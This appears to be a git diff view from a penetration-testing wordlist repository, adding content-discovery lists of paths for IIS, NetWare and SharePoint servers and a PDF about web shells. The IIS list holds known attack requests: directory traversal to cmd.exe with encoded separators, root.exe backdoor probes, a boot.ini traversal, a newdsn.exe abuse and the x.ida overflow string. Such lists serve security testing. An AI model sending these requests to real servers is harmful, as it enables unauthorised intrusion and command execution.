/iisadmpwd/aexp3.htr
|
||||
/iisadmpwd/aexp4.htr
|
||||
/iisadmpwd/aexp4b.htr
|
||||
/iisadmpwd/anot.htr
|
||||
/iisadmpwd/anot3.htr
|
||||
/iissamples/exair/howitworks/Code.asp
|
||||
/iissamples/exair/howitworks/Codebrw1.asp
|
||||
/iissamples/exair/howitworks/Codebrws.asp
|
||||
/iissamples/sdk/asp/docs/CodeBrws.asp
|
||||
/iissamples/sdk/asp/docs/codebrw2.asp
|
||||
/iissamples/sdk/asp/docs/codebrws.asp
|
||||
/index.php
|
||||
/market
|
||||
/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
|
||||
/msadc/Samples/selector/showcode.asp
|
||||
/msdac/root.exe?/c+dir
|
||||
/mspress30
|
||||
/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHilite
|
||||
/publisher
|
||||
/qwertypoiu.htw
|
||||
/scripts/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
|
||||
/scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir+c:\\
|
||||
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\
|
||||
/scripts/fpcount.exe
|
||||
/scripts/root.exe?/c+dir
|
||||
/scripts/tools/getdrvs.exe
|
||||
/scripts/tools/newdsn.exe
|
||||
/search?NS-query-pat=..\..\..\..\..\boot.ini
|
||||
/siteserver/publishing/viewcode.asp
|
||||
/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=goatfart+samples+from+microsoft&dbq=..%2F..%2Fwwwroot%2goatfart.html&newdb=CREA
|
||||
/vc30
|
||||
/x.ida?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=X
|
1670
discovery/win/interesting-files-microsoft-sharepoint.txt
Normal file
1670
discovery/win/interesting-files-microsoft-sharepoint.txt
Normal file
File diff suppressed because it is too large
Load diff
60
discovery/win/interesting-files-netware.txt
Normal file
60
discovery/win/interesting-files-netware.txt
Normal file
|
@ -0,0 +1,60 @@
|
|||
Aplicaciones
|
||||
EHS.Web
|
||||
Exchange
|
||||
ICHAIN
|
||||
ICHAINErrors
|
||||
ICHAINLogout
|
||||
ICS
|
||||
ICSIBroker
|
||||
ICSLogin
|
||||
NSearch
|
||||
NetStorage
|
||||
Portal
|
||||
SearchServlet
|
||||
apache
|
||||
aplicaciones
|
||||
bo
|
||||
eGuide
|
||||
eMFrame
|
||||
ed
|
||||
edgecgi
|
||||
edirectory
|
||||
eg
|
||||
eguide
|
||||
eis
|
||||
exteND
|
||||
extend
|
||||
fullpageservic
|
||||
home.html
|
||||
iFolder
|
||||
iManager
|
||||
ifolder
|
||||
im
|
||||
imanager
|
||||
index.html
|
||||
intranet
|
||||
iprint
|
||||
ndk
|
||||
ned
|
||||
nps
|
||||
nsadmin
|
||||
nsure
|
||||
oneNet
|
||||
pg
|
||||
portal
|
||||
portalservice
|
||||
principal
|
||||
quickfinder
|
||||
r3d
|
||||
service
|
||||
servlet
|
||||
site
|
||||
sms
|
||||
tomcat
|
||||
update
|
||||
vo
|
||||
voffice
|
||||
webacc
|
||||
webgui
|
||||
welcome
|
||||
wgate
|
BIN
docs/misc/Web-Shells-rev2.pdf
Normal file
BIN
docs/misc/Web-Shells-rev2.pdf
Normal file
Binary file not shown.
Some files were not shown because too many files have changed in this diff Show more
Loading…
Reference in a new issue